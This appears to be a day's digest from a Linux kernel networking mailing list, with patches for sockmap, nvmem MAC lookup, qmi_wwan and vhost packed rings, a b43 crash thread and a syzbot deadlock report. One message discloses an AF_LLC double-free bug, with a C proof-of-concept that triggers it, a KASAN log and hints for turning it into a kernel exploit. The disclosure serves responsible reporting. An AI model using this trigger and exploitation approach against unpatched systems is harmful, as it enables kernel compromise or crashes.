date:20180325

[PATCH bpf-next] bpf: sockmap: initialize sg table entries properly

2018-03-25 Thread Prashant Bhole

When CONFIG_DEBUG_SG is set, sg->sg_magic is initialized to SG_MAGIC,
when sg table is initialized using sg_init_table(). Magic is checked
while navigating the scatterlist. We hit BUG_ON when magic check is
failed.

Fixed following things:
- Initialization of sg table in bpf_tcp_sendpage() was missing,
  initialized it using sg_init_table()

- bpf_tcp_sendmsg() initializes sg table using sg_init_table() before
  entering the loop, but further consumed sg entries are initialized
  using memset. Fixed it by replacing memset with sg_init_table() in
  function bpf_tcp_push()

Signed-off-by: Prashant Bhole 
---
 kernel/bpf/sockmap.c | 11 +++
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/kernel/bpf/sockmap.c b/kernel/bpf/sockmap.c
index 69c5bccabd22..8a848a99d768 100644
--- a/kernel/bpf/sockmap.c
+++ b/kernel/bpf/sockmap.c
@@ -312,7 +312,7 @@ static int bpf_tcp_push(struct sock *sk, int apply_bytes,
md->sg_start++;
if (md->sg_start == MAX_SKB_FRAGS)
md->sg_start = 0;
-   memset(sg, 0, sizeof(*sg));
+   sg_init_table(sg, 1);
 
if (md->sg_start == md->sg_end)
break;
@@ -763,10 +763,14 @@ static int bpf_tcp_sendpage(struct sock *sk, struct page 
*page,
 
lock_sock(sk);
 
-   if (psock->cork_bytes)
+   if (psock->cork_bytes) {
m = psock->cork;
-   else
+   sg = &m->sg_data[m->sg_end];
+   } else {
m = &md;
+   sg = m->sg_data;
+   sg_init_table(sg, MAX_SKB_FRAGS);
+   }
 
/* Catch case where ring is full and sendpage is stalled. */
if (unlikely(m->sg_end == m->sg_start &&
@@ -774,7 +778,6 @@ static int bpf_tcp_sendpage(struct sock *sk, struct page 
*page,
goto out_err;
 
psock->sg_size += size;
-   sg = &m->sg_data[m->sg_end];
sg_set_page(sg, page, size, offset);
get_page(page);
m->sg_copy[m->sg_end] = true;
-- 
2.14.3

Security Vulnerability in AF_LLC (Double Free)

2018-03-25 Thread Noam Rathaus

Hi,

We would like to report a security vulnerability in AF_LLC.

The credit should be given as such:
"An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program."

==
# AF_LLC DOUBLE FREE

## affected versions
The bug seems to be present in the Linux kernel from the latest
version to 2.6.39.4 and even earlier versions.

## summary
LLC sockets can only be created with CAP_NET_RAW capability.
Setsockopt() with SO_BINDTODEVICE is necessary to setup
sk->sk_bound_dev_if so that bind() won't fail as well as
llc_ui_sendmsg() when checking that llc->addr is initialized.

Then after connecting and sending a message, the code leads to
llc_build_and_send_pkt.

The error can be spotted in llc_conn_state_process():

```
...
out_kfree_skb:
kfree_skb(skb);
out_skb_put:
kfree_skb(skb);
return rc;
}
```

The end of the function see 2 consecutive free on the skb which causes
a UAF first followed by a double free as seen in the crash log:

```
void kfree_skb(struct sk_buff *skb)
{
if (!skb_unref(skb))
return;

trace_kfree_skb(skb, __builtin_return_address(0));
__kfree_skb(skb);
}
```


Exploiting the double free on the struct sk_buff itself is not easy
due to that fact that it belongs to its own slab. However, a sk_buff
has a kmalloc-ed buffer which is allocated and deallocated side by
side with it (cf. https://xairy.github.io/blog/2016/cve-2016-2384).
It's kind of similar to 2 consecutive double free.

We want to target the 2nd free to free any other object with function
pointers (in the general kmalloc) so that we can abuse the crafted
UAF. A good target could be to free a skb's buffer and control the
destructor_arg in skb_shared_info just like the writeup in the above
link.

## POC

```
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

struct sockaddr_llc {
short  sllc_family;
short  sllc_arphrd;
unsigned char   sllc_test;
unsigned char   sllc_xid;
unsigned char sllc_ua;
unsigned char   sllc_sap;
unsigned char   sllc_mac[6];
unsigned char   __pad[2];
};

void test()
{
int fd = socket(AF_LLC, SOCK_STREAM, 0);
char output[32] = "lo";
socklen_t len;
setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10);
struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2};
bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc));
struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2};
connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc));

char msg[0x10] = "";
send(fd, msg, 0x10, 0);
}

int main()
{
test();
return 0;
}
```

## crash log

```
[   23.142123] BUG: KASAN: use-after-free in kfree_skb+0x298/0x2f0
[   23.143012] Read of size 4 at addr 8801093d1124 by task poc/207
[   23.143742]
[   23.143892] CPU: 0 PID: 207 Comm: poc Not tainted 4.15.0+ #5
[   23.144396] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.11.0-0-g63451fca13-prebuilt.qemu-project.org 04/01/2014
[   23.145452] Call Trace:
[   23.145694]  dump_stack+0xcc/0x16c
[   23.147098]  print_address_description+0x73/0x290
[   23.147534]  kasan_report+0x277/0x360
[   23.148204]  kfree_skb+0x298/0x2f0
[   23.149829]  llc_conn_state_process+0x12d/0x1260
[   23.150536]  llc_build_and_send_pkt+0x195/0x240
[   23.151135]  llc_ui_sendmsg+0x78b/0x1280
[   23.155716]  sock_sendmsg+0xc5/0x100
[   23.156413]  SYSC_sendto+0x33a/0x580
[   23.163517]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.164241] RIP: 0033:0x400cfd
[   23.164694] RSP: 002b:7ffd3d1f4bd8 EFLAGS: 0246
[   23.164698]
[   23.165766] Allocated by task 207:
[   23.166397]  kasan_kmalloc+0xa0/0xd0
[   23.167071]  kmem_cache_alloc_node+0x100/0x1c0
[   23.167829]  __alloc_skb+0xe2/0x700
[   23.168457]  alloc_skb_with_frags+0x10a/0x690
[   23.169174]  sock_alloc_send_pskb+0x735/0x920
[   23.170156]  llc_ui_sendmsg+0x427/0x1280
[   23.170960]  sock_sendmsg+0xc5/0x100
[   23.171547]  SYSC_sendto+0x33a/0x580
[   23.172280]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.173460]
[   23.173763] Freed by task 207:
[   23.174261]  kasan_slab_free+0x71/0xc0
[   23.174843]  kmem_cache_free+0x77/0x1e0
[   23.175410]  kfree_skbmem+0x1a1/0x1d0
[   23.175987]  kfree_skb+0x12f/0x2f0
[   23.176541]  llc_conn_state_process+0x120/0x1260
[   23.177406]  llc_build_and_send_pkt+0x195/0x240
[   23.178051]  llc_ui_sendmsg+0x78b/0x1280
[   23.178647]  sock_sendmsg+0xc5/0x100
[   23.179175]  SYSC_sendto+0x33a/0x580
[   23.179702]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.180368]
[   23.180603] The buggy address belongs to the object at 8801093d1040
[   23.180603]  which belongs to the cache skbuff_head_cache of size 232
[   23.182503] The buggy address is located 228 bytes inside of
[   23.182503]  232-byte region [8801093d1040, 8801093d1128)
[   23.184255] The buggy address belongs to the page:
[   23.184976] page:ea00042

[PATCH v2] of_net: Implement of_get_nvmem_mac_address helper

2018-03-25 Thread Mike Looijmans

It's common practice to store MAC addresses for network interfaces into
nvmem devices. However the code to actually do this in the kernel lacks,
so this patch adds of_get_nvmem_mac_address() for drivers to obtain the
address from an nvmem cell provider.

This is particulary useful on devices where the ethernet interface cannot
be configured by the bootloader, for example because it's in an FPGA.

Tested by adapting the cadence macb driver to call this instead of
of_get_mac_address().

Signed-off-by: Mike Looijmans 
---
v2: Use of_nvmem_cell_get to avoid needing the assiciated device
Use void* instead of char*
Add devicetree binding doc
 Documentation/devicetree/bindings/net/ethernet.txt |  2 +
 drivers/of/of_net.c| 47 ++
 include/linux/of_net.h |  6 +++
 3 files changed, 55 insertions(+)

diff --git a/Documentation/devicetree/bindings/net/ethernet.txt 
b/Documentation/devicetree/bindings/net/ethernet.txt
index 2974e63..cfc376b 100644
--- a/Documentation/devicetree/bindings/net/ethernet.txt
+++ b/Documentation/devicetree/bindings/net/ethernet.txt
@@ -10,6 +10,8 @@ Documentation/devicetree/bindings/phy/phy-bindings.txt.
   the boot program; should be used in cases where the MAC address assigned to
   the device by the boot program is different from the "local-mac-address"
   property;
+- nvmem-cells: phandle, reference to an nvmem node for the MAC address;
+- nvmem-cell-names: string, should be "mac-address" if nvmem is to be used;
 - max-speed: number, specifies maximum speed in Mbit/s supported by the device;
 - max-frame-size: number, maximum transfer unit (IEEE defined MTU), rather than
   the maximum frame size (there's contradiction in the Devicetree
diff --git a/drivers/of/of_net.c b/drivers/of/of_net.c
index d820f3e..8999745 100644
--- a/drivers/of/of_net.c
+++ b/drivers/of/of_net.c
@@ -7,6 +7,7 @@
  */
 #include 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -80,3 +81,49 @@ const void *of_get_mac_address(struct device_node *np)
return of_get_mac_addr(np, "address");
 }
 EXPORT_SYMBOL(of_get_mac_address);
+
+/**
+ * Search the device tree for a MAC address, by calling of_get_mac_address
+ * and if that doesn't provide an address, fetch it from an nvmem provider
+ * using the name 'mac-address'.
+ * On success, copies the new address is into memory pointed to by addr and
+ * returns 0. Returns a negative error code otherwise.
+ * @dev:   Pointer to the device containing the device_node
+ * @addr:  Pointer to receive the MAC address using ether_addr_copy()
+ */
+int of_get_nvmem_mac_address(struct device_node *np, void *addr)
+{
+   const void *mac;
+   struct nvmem_cell *cell;
+   size_t len;
+   int ret;
+
+   mac = of_get_mac_address(np);
+   if (mac) {
+   ether_addr_copy(addr, mac);
+   return 0;
+   }
+
+   cell = of_nvmem_cell_get(np, "mac-address");
+   if (IS_ERR(cell))
+   return PTR_ERR(cell);
+
+   mac = nvmem_cell_read(cell, &len);
+
+   nvmem_cell_put(cell);
+
+   if (IS_ERR(mac))
+   return PTR_ERR(mac);
+
+   if (len < 6 || !is_valid_ether_addr(mac)) {
+   ret = -EINVAL;
+   } else {
+   ether_addr_copy(addr, mac);
+   ret = 0;
+   }
+
+   kfree(mac);
+
+   return ret;
+}
+EXPORT_SYMBOL(of_get_nvmem_mac_address);
diff --git a/include/linux/of_net.h b/include/linux/of_net.h
index 9cd72aa..90d81ee 100644
--- a/include/linux/of_net.h
+++ b/include/linux/of_net.h
@@ -13,6 +13,7 @@
 struct net_device;
 extern int of_get_phy_mode(struct device_node *np);
 extern const void *of_get_mac_address(struct device_node *np);
+extern int of_get_nvmem_mac_address(struct device_node *np, void *addr);
 extern struct net_device *of_find_net_device_by_node(struct device_node *np);
 #else
 static inline int of_get_phy_mode(struct device_node *np)
@@ -25,6 +26,11 @@ static inline const void *of_get_mac_address(struct 
device_node *np)
return NULL;
 }
 
+static inline int of_get_nvmem_mac_address(struct device_node *np, void *addr)
+{
+   return -ENODEV;
+}
+
 static inline struct net_device *of_find_net_device_by_node(struct device_node 
*np)
 {
return NULL;
-- 
1.9.1

Re: [QUESTION] Mainline support for B43_PHY_AC wifi cards

2018-03-25 Thread Juri Lelli

On 24/03/18 00:01, Rafał Miłecki wrote:
> On 23 March 2018 at 15:09, Juri Lelli  wrote:
> > On 23/03/18 14:43, Rafał Miłecki wrote:
> >> Hi,
> >>
> >> On 23 March 2018 at 10:47, Juri Lelli  wrote:
> >> > I've got a Dell XPS 13 9343/0TM99H (BIOS A15 01/23/2018) mounting a
> >> > BCM4352 802.11ac (rev 03) wireless card and so far I've been using it on
> >> > Fedora with broadcom-wl package (which I believe installs Broadcom's STA
> >> > driver?). It works good apart from occasional hiccups after suspend.
> >> >
> >> > I'd like to get rid of that dependency (you can understand that it's
> >> > particularly annoying when testing mainline kernels), but I found out
> >> > that support for my card is BROKEN in mainline [1]. Just to see what
> >> > happens, I forcibly enabled it witnessing that it indeed crashes like
> >> > below as Kconfig warns. :)
> >> >
> >> >  bcma: bus0: Found chip with id 0x4352, rev 0x03 and package 0x00
> >> >  bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 0x2B, 
> >> > class 0x0)
> >> >  bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, rev 0x2A, 
> >> > class 0x0)
> >> >  bcma: bus0: Core 2 found: ARM CR4 (manuf 0x4BF, id 0x83E, rev 0x02, 
> >> > class 0x0)
> >> >  bcma: bus0: Core 3 found: PCIe Gen2 (manuf 0x4BF, id 0x83C, rev 0x01, 
> >> > class 0x0)
> >> >  bcma: bus0: Core 4 found: USB 2.0 Device (manuf 0x4BF, id 0x81A, rev 
> >> > 0x11, class 0x0)
> >> >  bcma: Unsupported SPROM revision: 11
> >> >  bcma: bus0: Invalid SPROM read from the PCIe card, trying to use 
> >> > fallback SPROM
> >> >  bcma: bus0: Using fallback SPROM failed (err -2)
> >> >  bcma: bus0: No SPROM available
> >> >  bcma: bus0: Bus registered
> >> >  b43-phy0: Broadcom 4352 WLAN found (core revision 42)
> >> >  b43-phy0: Found PHY: Analog 12, Type 11 (AC), Revision 1
> >> >  b43-phy0: Found Radio: Manuf 0x17F, ID 0x2069, Revision 4, Version 0
> >> >  BUG: unable to handle kernel NULL pointer dereference at 
> >> > 
> >>
> >> This isn't really useful without a full backtrace.
> >
> > Sure. I cut it here because I didn't expect people to debug what is
> > already known to be broken (but still it seemed to carry useful
> > information about the hw). :)
> 
> Please paste the remaining part if you still got it.

Sure, please find it below.

Thanks!

- Juri

--->8---

[   60.732180] cfg80211: Loading compiled-in X.509 certificates for regulatory 
database
[   60.733048] cfg80211: Loaded X.509 cert 'sforshee: 00b28ddf47aef9cea7'
[   60.733303] platform regulatory.0: Direct firmware load for regulatory.db 
failed with error -2
[   60.733305] cfg80211: failed to load regulatory.db
[   61.047277] bcma: bus0: Found chip with id 0x4352, rev 0x03 and package 0x00
[   61.047302] bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 
0x2B, class 0x0)
[   61.047316] bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, 
rev 0x2A, class 0x0)
[   61.047340] bcma: bus0: Core 2 found: ARM CR4 (manuf 0x4BF, id 0x83E, rev 
0x02, class 0x0)
[   61.047366] bcma: bus0: Core 3 found: PCIe Gen2 (manuf 0x4BF, id 0x83C, rev 
0x01, class 0x0)
[   61.047380] bcma: bus0: Core 4 found: USB 2.0 Device (manuf 0x4BF, id 0x81A, 
rev 0x11, class 0x0)
[   61.107321] bcma: Unsupported SPROM revision: 11
[   61.107325] bcma: bus0: Invalid SPROM read from the PCIe card, trying to use 
fallback SPROM
[   61.107326] bcma: bus0: Using fallback SPROM failed (err -2)
[   61.107327] bcma: bus0: No SPROM available
[   61.109830] bcma: bus0: Bus registered
[   61.242068] b43-phy0: Broadcom 4352 WLAN found (core revision 42)
[   61.242481] b43-phy0: Found PHY: Analog 12, Type 11 (AC), Revision 1
[   61.242487] b43-phy0: Found Radio: Manuf 0x17F, ID 0x2069, Revision 4, 
Version 0
[   61.242909] BUG: unable to handle kernel NULL pointer dereference at 

[   61.242916] IP:   (null)
[   61.242919] PGD 0 P4D 0 
[   61.242924] Oops: 0010 [#1] PREEMPT SMP PTI
[   61.242926] Modules linked in: b43(+) bcma mac80211 cfg80211 ssb mmc_core 
rfcomm fuse nf_conntrack_netbios_ns nf_conntrack_broadcast xt_CT ip6t_rpfilter 
ip6t_REJECT nf_reject_ipv6 xt_conntrack ip_set nfnetlink ebtable_nat 
ebtable_broute bridge stp llc ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 
nf_nat_ipv6 ip6table_mangle ip6table_raw ip6table_security iptable_nat 
nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack libcrc32c 
iptable_mangle iptable_raw iptable_security ebtable_filter ebtables 
ip6table_filter ip6_tables cmac bnep sunrpc intel_rapl x86_pkg_temp_thermal 
intel_powerclamp coretemp kvm_intel kvm snd_hda_codec_realtek 
snd_hda_codec_hdmi snd_hda_codec_generic snd_hda_intel btusb snd_hda_codec 
uvcvideo btrtl btbcm btintel snd_hda_core bluetooth snd_hwdep videobuf2_vmalloc 
snd_seq
[   61.242989]  videobuf2_memops videobuf2_v4l2 iTCO_wdt snd_seq_device snd_pcm 
videobuf2_common iTCO_vendor_support dell_laptop dell_wmi irqbypass videodev 
wmi_bmof sparse_keymap dell_smbios intel_cstate dell_

[PATCHv2] net/usb/qmi_wwan.c: Add USB id for lt4120 modem

2018-03-25 Thread Torsten Hilbrich

This is needed to support the modem found in HP EliteBook 820 G3.

Signed-off-by: Torsten Hilbrich 
---
 drivers/net/usb/qmi_wwan.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
index 76ac48095c29..e3ef0a0c715d 100644
--- a/drivers/net/usb/qmi_wwan.c
+++ b/drivers/net/usb/qmi_wwan.c
@@ -1240,6 +1240,7 @@ static const struct usb_device_id products[] = {
{QMI_FIXED_INTF(0x413c, 0x81b6, 8)},/* Dell Wireless 5811e */
{QMI_FIXED_INTF(0x413c, 0x81b6, 10)},   /* Dell Wireless 5811e */
{QMI_FIXED_INTF(0x03f0, 0x4e1d, 8)},/* HP lt4111 LTE/EV-DO/HSPA+ 
Gobi 4G Module */
+   {QMI_FIXED_INTF(0x03f0, 0x9d1d, 1)},/* HP lt4120 Snapdragon X5 LTE 
*/
{QMI_FIXED_INTF(0x22de, 0x9061, 3)},/* WeTelecom WPD-600N */
{QMI_FIXED_INTF(0x1e0e, 0x9001, 5)},/* SIMCom 7230E */
{QMI_QUIRK_SET_DTR(0x2c7c, 0x0125, 4)}, /* Quectel EC25, EC20 R2.0  
Mini PCIe */
-- 
2.11.0

Re: possible deadlock in handle_rx

2018-03-25 Thread Jason Wang




On 2018年03月26日 08:01, syzbot wrote:

Hello,

syzbot hit the following crash on upstream commit
cb6416592bc2a8b731dabcec0d63cda270764fc6 (Sun Mar 25 17:45:10 2018 +)
Merge tag 'dmaengine-fix-4.16-rc7' of 
git://git.kernel.org/pub/scm/linux/kernel/git/vkoul/slave-dma
syzbot dashboard link: 
https://syzkaller.appspot.com/bug?extid=7f073540b1384a614e09


So far this crash happened 4 times on upstream.
C reproducer: https://syzkaller.appspot.com/x/repro.c?id=6506789075943424
syzkaller reproducer: 
https://syzkaller.appspot.com/x/repro.syz?id=5716250550337536
Raw console output: 
https://syzkaller.appspot.com/x/log.txt?id=5142038655795200
Kernel config: 
https://syzkaller.appspot.com/x/.config?id=-5034017172441945317

compiler: gcc (GCC) 7.1.1 20170620

IMPORTANT: if you fix the bug, please add the following tag to the 
commit:

Reported-by: syzbot+7f073540b1384a614...@syzkaller.appspotmail.com
It will help syzbot understand when the bug is fixed. See footer for 
details.

If you forward the report, please keep this part and the footer.



WARNING: possible recursive locking detected
4.16.0-rc6+ #366 Not tainted

vhost-4248/4760 is trying to acquire lock:
 (&vq->mutex){+.+.}, at: [<3482bddc>] 
vhost_net_rx_peek_head_len drivers/vhost/net.c:633 [inline]
 (&vq->mutex){+.+.}, at: [<3482bddc>] handle_rx+0xeb1/0x19c0 
drivers/vhost/net.c:784


but task is already holding lock:
 (&vq->mutex){+.+.}, at: [<4de72f44>] handle_rx+0x1f5/0x19c0 
drivers/vhost/net.c:766


other info that might help us debug this:
 Possible unsafe locking scenario:

   CPU0
   
  lock(&vq->mutex);
  lock(&vq->mutex);

 *** DEADLOCK ***

 May be due to missing lock nesting notation


Yes, it's a missing of nesting notation.

Will post a patch soon.

Thanks

Re: [RFC PATCH V2 0/8] Packed ring for vhost

2018-03-25 Thread Jason Wang


cc Jens, Tiwei and Wei

Thanks


On 2018年03月26日 11:38, Jason Wang wrote:

Hi all:

This RFC implement packed ring layout. The code were tested with pmd
implement by Jens at
http://dpdk.org/ml/archives/dev/2018-January/089417.html. Minor change
was needed for pmd codes to kick virtqueue since it assumes a busy
polling backend.

Test were done between localhost and guest. Testpmd (rxonly) in guest
reports 2.4Mpps. Testpmd (txonly) repots about 2.1Mpps.

Notes: The event suppression /indirect descriptor support is complied
test only because of lacked driver support.

Changes from V1:

- Refactor vhost used elem code to avoid open coding on used elem
- Event suppression support (compile test only).
- Indirect descriptor support (compile test only).
- Zerocopy support.
- vIOMMU support.
- SCSI/VSOCK support (compile test only).
- Fix several bugs

For simplicity, I don't implement batching or other optimizations.

Please review.

Thanks

Jason Wang (8):
   vhost: move get_rx_bufs to vhost.c
   vhost: hide used ring layout from device
   vhost: do not use vring_used_elem
   vhost_net: do not explicitly manipulate vhost_used_elem
   vhost: vhost_put_user() can accept metadata type
   virtio: introduce packed ring defines
   vhost: packed ring support
   vhost: event suppression for packed ring

  drivers/vhost/net.c| 138 ++-
  drivers/vhost/scsi.c   |  62 +--
  drivers/vhost/vhost.c  | 818 ++---
  drivers/vhost/vhost.h  |  46 ++-
  drivers/vhost/vsock.c  |  42 +-
  include/uapi/linux/virtio_config.h |   9 +
  include/uapi/linux/virtio_ring.h   |  32 ++
  7 files changed, 921 insertions(+), 226 deletions(-)

[RFC PATCH V2 1/8] vhost: move get_rx_bufs to vhost.c

2018-03-25 Thread Jason Wang

Move get_rx_bufs() to vhost.c and rename it to
vhost_get_rx_bufs(). This helps to hide vring internal layout from
specific device implementation. Packed ring implementation will
benefit from this.

Signed-off-by: Jason Wang 
---
 drivers/vhost/net.c   | 83 ++-
 drivers/vhost/vhost.c | 78 +++
 drivers/vhost/vhost.h |  7 +
 3 files changed, 88 insertions(+), 80 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index 8139bc7..57dfa63 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -658,83 +658,6 @@ static int vhost_net_rx_peek_head_len(struct vhost_net 
*net, struct sock *sk)
return len;
 }
 
-/* This is a multi-buffer version of vhost_get_desc, that works if
- * vq has read descriptors only.
- * @vq - the relevant virtqueue
- * @datalen- data length we'll be reading
- * @iovcount   - returned count of io vectors we fill
- * @log- vhost log
- * @log_num- log offset
- * @quota   - headcount quota, 1 for big buffer
- * returns number of buffer heads allocated, negative on error
- */
-static int get_rx_bufs(struct vhost_virtqueue *vq,
-  struct vring_used_elem *heads,
-  int datalen,
-  unsigned *iovcount,
-  struct vhost_log *log,
-  unsigned *log_num,
-  unsigned int quota)
-{
-   unsigned int out, in;
-   int seg = 0;
-   int headcount = 0;
-   unsigned d;
-   int r, nlogs = 0;
-   /* len is always initialized before use since we are always called with
-* datalen > 0.
-*/
-   u32 uninitialized_var(len);
-
-   while (datalen > 0 && headcount < quota) {
-   if (unlikely(seg >= UIO_MAXIOV)) {
-   r = -ENOBUFS;
-   goto err;
-   }
-   r = vhost_get_vq_desc(vq, vq->iov + seg,
- ARRAY_SIZE(vq->iov) - seg, &out,
- &in, log, log_num);
-   if (unlikely(r < 0))
-   goto err;
-
-   d = r;
-   if (d == vq->num) {
-   r = 0;
-   goto err;
-   }
-   if (unlikely(out || in <= 0)) {
-   vq_err(vq, "unexpected descriptor format for RX: "
-   "out %d, in %d\n", out, in);
-   r = -EINVAL;
-   goto err;
-   }
-   if (unlikely(log)) {
-   nlogs += *log_num;
-   log += *log_num;
-   }
-   heads[headcount].id = cpu_to_vhost32(vq, d);
-   len = iov_length(vq->iov + seg, in);
-   heads[headcount].len = cpu_to_vhost32(vq, len);
-   datalen -= len;
-   ++headcount;
-   seg += in;
-   }
-   heads[headcount - 1].len = cpu_to_vhost32(vq, len + datalen);
-   *iovcount = seg;
-   if (unlikely(log))
-   *log_num = nlogs;
-
-   /* Detect overrun */
-   if (unlikely(datalen > 0)) {
-   r = UIO_MAXIOV + 1;
-   goto err;
-   }
-   return headcount;
-err:
-   vhost_discard_vq_desc(vq, headcount);
-   return r;
-}
-
 /* Expects to be always run from workqueue - which acts as
  * read-size critical section for our kind of RCU. */
 static void handle_rx(struct vhost_net *net)
@@ -784,9 +707,9 @@ static void handle_rx(struct vhost_net *net)
while ((sock_len = vhost_net_rx_peek_head_len(net, sock->sk))) {
sock_len += sock_hlen;
vhost_len = sock_len + vhost_hlen;
-   headcount = get_rx_bufs(vq, vq->heads + nheads, vhost_len,
-   &in, vq_log, &log,
-   likely(mergeable) ? UIO_MAXIOV : 1);
+   headcount = vhost_get_bufs(vq, vq->heads + nheads, vhost_len,
+  &in, vq_log, &log,
+  likely(mergeable) ? UIO_MAXIOV : 1);
/* On error, stop handling until the next kick. */
if (unlikely(headcount < 0))
goto out;
diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index 1b3e8d2d..c57df71 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -2098,6 +2098,84 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq,
 }
 EXPORT_SYMBOL_GPL(vhost_get_vq_desc);
 
+/* This is a multi-buffer version of vhost_get_desc, that works if
+ * vq has read descriptors only.
+ * @vq - the relevant virtqueue
+ * @datalen- data length we'll be reading
+ * @iovcount   - returned count of io vectors we fill
+ * @log- vhost log
+ * @log_num- log offset
+ * @qu

[RFC PATCH V2 0/8] Packed ring for vhost

2018-03-25 Thread Jason Wang

Hi all:

This RFC implement packed ring layout. The code were tested with pmd
implement by Jens at
http://dpdk.org/ml/archives/dev/2018-January/089417.html. Minor change
was needed for pmd codes to kick virtqueue since it assumes a busy
polling backend.

Test were done between localhost and guest. Testpmd (rxonly) in guest
reports 2.4Mpps. Testpmd (txonly) repots about 2.1Mpps.

Notes: The event suppression /indirect descriptor support is complied
   test only because of lacked driver support.

Changes from V1:

- Refactor vhost used elem code to avoid open coding on used elem
- Event suppression support (compile test only).
- Indirect descriptor support (compile test only).
- Zerocopy support.
- vIOMMU support.
- SCSI/VSOCK support (compile test only).
- Fix several bugs

For simplicity, I don't implement batching or other optimizations.

Please review.

Thanks

Jason Wang (8):
  vhost: move get_rx_bufs to vhost.c
  vhost: hide used ring layout from device
  vhost: do not use vring_used_elem
  vhost_net: do not explicitly manipulate vhost_used_elem
  vhost: vhost_put_user() can accept metadata type
  virtio: introduce packed ring defines
  vhost: packed ring support
  vhost: event suppression for packed ring

 drivers/vhost/net.c| 138 ++-
 drivers/vhost/scsi.c   |  62 +--
 drivers/vhost/vhost.c  | 818 ++---
 drivers/vhost/vhost.h  |  46 ++-
 drivers/vhost/vsock.c  |  42 +-
 include/uapi/linux/virtio_config.h |   9 +
 include/uapi/linux/virtio_ring.h   |  32 ++
 7 files changed, 921 insertions(+), 226 deletions(-)

-- 
2.7.4

[RFC PATCH V2 3/8] vhost: do not use vring_used_elem

2018-03-25 Thread Jason Wang

Instead of depending on the exported vring_used_elem, this patch
switches to use a new internal structure vhost_used_elem which embed
vring_used_elem in itself. This could be used to let vhost to record
extra metadata for the incoming packed ring layout.

Signed-off-by: Jason Wang 
---
 drivers/vhost/net.c   | 19 ++-
 drivers/vhost/scsi.c  | 10 +-
 drivers/vhost/vhost.c | 33 -
 drivers/vhost/vhost.h | 18 +++---
 drivers/vhost/vsock.c |  6 +++---
 5 files changed, 45 insertions(+), 41 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index f821fcd..7ea2aee 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -337,10 +337,10 @@ static void vhost_zerocopy_signal_used(struct vhost_net 
*net,
int j = 0;
 
for (i = nvq->done_idx; i != nvq->upend_idx; i = (i + 1) % UIO_MAXIOV) {
-   if (vq->heads[i].len == VHOST_DMA_FAILED_LEN)
+   if (vq->heads[i].elem.len == VHOST_DMA_FAILED_LEN)
vhost_net_tx_err(net);
-   if (VHOST_DMA_IS_DONE(vq->heads[i].len)) {
-   vq->heads[i].len = VHOST_DMA_CLEAR_LEN;
+   if (VHOST_DMA_IS_DONE(vq->heads[i].elem.len)) {
+   vq->heads[i].elem.len = VHOST_DMA_CLEAR_LEN;
++j;
} else
break;
@@ -363,7 +363,7 @@ static void vhost_zerocopy_callback(struct ubuf_info *ubuf, 
bool success)
rcu_read_lock_bh();
 
/* set len to mark this desc buffers done DMA */
-   vq->heads[ubuf->desc].len = success ?
+   vq->heads[ubuf->desc].elem.len = success ?
VHOST_DMA_DONE_LEN : VHOST_DMA_FAILED_LEN;
cnt = vhost_net_ubuf_put(ubufs);
 
@@ -422,7 +422,7 @@ static int vhost_net_enable_vq(struct vhost_net *n,
 
 static int vhost_net_tx_get_vq_desc(struct vhost_net *net,
struct vhost_virtqueue *vq,
-   struct vring_used_elem *used_elem,
+   struct vhost_used_elem *used_elem,
struct iovec iov[], unsigned int iov_size,
unsigned int *out_num, unsigned int *in_num)
 {
@@ -473,7 +473,7 @@ static void handle_tx(struct vhost_net *net)
size_t hdr_size;
struct socket *sock;
struct vhost_net_ubuf_ref *uninitialized_var(ubufs);
-   struct vring_used_elem used;
+   struct vhost_used_elem used;
bool zcopy, zcopy_used;
 
mutex_lock(&vq->mutex);
@@ -537,9 +537,10 @@ static void handle_tx(struct vhost_net *net)
struct ubuf_info *ubuf;
ubuf = nvq->ubuf_info + nvq->upend_idx;
 
-   vq->heads[nvq->upend_idx].id =
-   cpu_to_vhost32(vq, used.id);
-   vq->heads[nvq->upend_idx].len = VHOST_DMA_IN_PROGRESS;
+   vq->heads[nvq->upend_idx].elem.id =
+   cpu_to_vhost32(vq, used.elem.id);
+   vq->heads[nvq->upend_idx].elem.len =
+   VHOST_DMA_IN_PROGRESS;
ubuf->callback = vhost_zerocopy_callback;
ubuf->ctx = nvq->ubufs;
ubuf->desc = nvq->upend_idx;
diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c
index 654c71f..ac11412 100644
--- a/drivers/vhost/scsi.c
+++ b/drivers/vhost/scsi.c
@@ -67,7 +67,7 @@ struct vhost_scsi_inflight {
 
 struct vhost_scsi_cmd {
/* Descriptor from vhost_get_vq_desc() for virt_queue segment */
-   struct vring_used_elem tvc_vq_used;
